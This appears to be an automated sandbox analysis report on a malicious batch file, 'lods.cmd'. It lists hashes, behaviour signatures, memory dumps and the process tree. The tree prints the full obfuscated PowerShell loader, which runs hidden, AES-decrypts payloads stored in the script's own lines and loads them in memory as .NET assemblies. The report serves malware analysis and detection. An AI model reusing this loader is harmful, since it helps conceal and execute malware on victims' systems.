1a5ad9ae7b0dcdc2edb7e93556f2c59c84f113879df380d95835fb8ea3914ed8

Resubmissions

15-02-2024 02:04

240215-chmlpaeg88 10

Analysis

max time kernel
358s
max time network
359s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
15-02-2024 02:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lods.cmd
Size

264KB
MD5

194118c43c65faad06bf5ff6cd9b52a2
SHA1

7bdf85b3968747acf21d37df5e56d54f8a0c7e62
SHA256

1a5ad9ae7b0dcdc2edb7e93556f2c59c84f113879df380d95835fb8ea3914ed8
SHA512

42a7d57520d68acfc79972e387cf6a9ca45b1159ee14ba1d6b4bc801d90d38e7eeb6dfd6aa3c039773cceb6d3a9223cc8459abd7661ae162b89644b6db8996b2
SSDEEP

6144:0ChPgq+rL7AAZG5R0Oscn3X/QOT31RvQ/3R:0uY105CO+aUR

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

3040 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

3040 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3040 powershell.exe

pid	process
3040	powershell.exe

pid	process
3040	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3040	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2872 wrote to memory of 2964	2872	cmd.exe	cmd.exe
PID 2872 wrote to memory of 2964	2872	cmd.exe	cmd.exe
PID 2872 wrote to memory of 2964	2872	cmd.exe	cmd.exe
PID 2964 wrote to memory of 3020	2964	cmd.exe	cmd.exe
PID 2964 wrote to memory of 3020	2964	cmd.exe	cmd.exe
PID 2964 wrote to memory of 3020	2964	cmd.exe	cmd.exe
PID 2964 wrote to memory of 3040	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 3040	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 3040	2964	cmd.exe	powershell.exe
PID 2964 wrote to memory of 3040	2964	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\lods.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lods.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\lods.cmd';$yDpz='IKCWFnKCWFvoKCWFkeKCWF'.Replace('KCWF', ''),'RXWQleXWQladLXWQlineXWQlsXWQl'.Replace('XWQl', ''),'GeXvGNtXvGNCXvGNurrXvGNenXvGNtPXvGNrXvGNocXvGNesXvGNsXvGN'.Replace('XvGN', ''),'FrxAMfomBxAMfasxAMfe64xAMfStxAMfrxAMfinxAMfgxAMf'.Replace('xAMf', ''),'CrXNBTeaXNBTtXNBTeDXNBTecXNBTrypXNBTtXNBTorXNBT'.Replace('XNBT', ''),'CeDSsheDSsaneDSsgeDSseEeDSsxteDSseeDSsneDSssieDSsoneDSs'.Replace('eDSs', ''),'EnNMJVtNMJVryPNMJVoinNMJVtNMJV'.Replace('NMJV', ''),'DAdhwecAdhwompAdhwrAdhweAdhwssAdhw'.Replace('Adhw', ''),'SpWkTWlWkTWitWkTW'.Replace('WkTW', ''),'MCgUGaCgUGinCgUGMCgUGodCgUGuCgUGleCgUG'.Replace('CgUG', ''),'LoauLqjduLqj'.Replace('uLqj', ''),'TrZUBEanZUBEsfZUBEoZUBErmZUBEFZUBEinZUBEalZUBEBZUBEloZUBEckZUBE'.Replace('ZUBE', ''),'CopFJKYyFJKYToFJKY'.Replace('FJKY', ''),'ElLTAIeLTAImeLTAInLTAItAtLTAI'.Replace('LTAI', '');powershell -w hidden;function jErZG($xSDUT){$cRyDq=[System.Security.Cryptography.Aes]::Create();$cRyDq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cRyDq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cRyDq.Key=[System.Convert]::($yDpz[3])('nlftMe/+KZS0ywJx8vu78pDIl8AaOzKgZtZxqMq9lB8=');$cRyDq.IV=[System.Convert]::($yDpz[3])('qNVO13iwamE1laUPiVA0ow==');$ofBHL=$cRyDq.($yDpz[4])();$mDAXw=$ofBHL.($yDpz[11])($xSDUT,0,$xSDUT.Length);$ofBHL.Dispose();$cRyDq.Dispose();$mDAXw;}function agayp($xSDUT){$jmbnu=New-Object System.IO.MemoryStream(,$xSDUT);$wFcba=New-Object System.IO.MemoryStream;$adSek=New-Object System.IO.Compression.GZipStream($jmbnu,[IO.Compression.CompressionMode]::($yDpz[7]));$adSek.($yDpz[12])($wFcba);$adSek.Dispose();$jmbnu.Dispose();$wFcba.Dispose();$wFcba.ToArray();}$oFNMD=[System.IO.File]::($yDpz[1])([Console]::Title);$JFMmz=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 5).Substring(2))));$CdrWA=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 6).Substring(2))));[System.Reflection.Assembly]::($yDpz[10])([byte[]]$CdrWA).($yDpz[6]).($yDpz[0])($null,$null);[System.Reflection.Assembly]::($yDpz[10])([byte[]]$JFMmz).($yDpz[6]).($yDpz[0])($null,$null); "
3⤵
PID:3020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3040-2-0x0000000073840000-0x0000000073DEB000-memory.dmp

Filesize
5.7MB

Download
memory/3040-3-0x0000000002920000-0x0000000002960000-memory.dmp

Filesize
256KB

Download
memory/3040-4-0x0000000073840000-0x0000000073DEB000-memory.dmp

Filesize
5.7MB

Download
memory/3040-5-0x0000000002920000-0x0000000002960000-memory.dmp

Filesize
256KB

Download
memory/3040-6-0x0000000073840000-0x0000000073DEB000-memory.dmp

Filesize
5.7MB

Download
memory/3040-7-0x0000000002920000-0x0000000002960000-memory.dmp

Filesize
256KB

Download
memory/3040-8-0x0000000002920000-0x0000000002960000-memory.dmp

Filesize
256KB

Download
memory/3040-9-0x0000000002920000-0x0000000002960000-memory.dmp

Filesize
256KB

Download